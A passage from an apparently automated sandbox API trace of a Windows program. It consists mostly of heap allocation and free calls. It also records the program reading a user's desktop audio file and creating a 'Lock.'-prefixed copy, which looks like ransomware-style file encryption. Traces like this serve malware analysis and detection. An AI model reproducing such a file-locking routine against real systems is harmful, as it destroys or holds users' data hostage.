lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.073] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0087.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0087.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0087.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0087.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0087.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a90 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0087.076] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0087.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0087.076] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.076] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0087.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0087.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0087.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0087.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0087.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0087.077] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/63ZOACO2R_kPqlEG.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\63zoaco2r_kpqleg.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0087.077] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.077] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0087.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.077] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0087.078] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.63ZOACO2R_kPqlEG.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.63zoaco2r_kpqleg.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0087.078] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.078] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.079] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.079] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.081] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0087.081] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x67b1, lpOverlapped=0x0) returned 1 [0087.082] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0087.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0087.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0087.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0087.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0087.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x67b1) returned 0x2abe880 [0087.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c6020 | out: hHeap=0x2af0000) returned 1 [0087.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0087.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0087.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0087.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0087.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0087.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0087.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0087.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x67b1) returned 0x2ac5040 [0087.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2abe880 | out: hHeap=0x2af0000) returned 1 [0087.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0087.086] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0087.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0087.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0087.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x67b1) returned 0x2abe880 [0087.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0087.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2abe880 | out: hHeap=0x2af0000) returned 1 [0087.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0087.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0087.086] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0087.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0087.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0087.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0087.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0087.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0087.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0087.086] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0087.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0087.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0087.086] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0087.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0087.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0087.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72748 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x67b1) returned 0x2abe880 [0087.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b58 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0087.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a58 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0087.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a730a8 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0087.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9808 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0087.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0087.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x67b1) returned 0x2a8a138 [0087.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0087.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0087.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0087.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0087.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0087.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0087.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0087.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0087.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0087.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0087.088] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0087.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0087.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 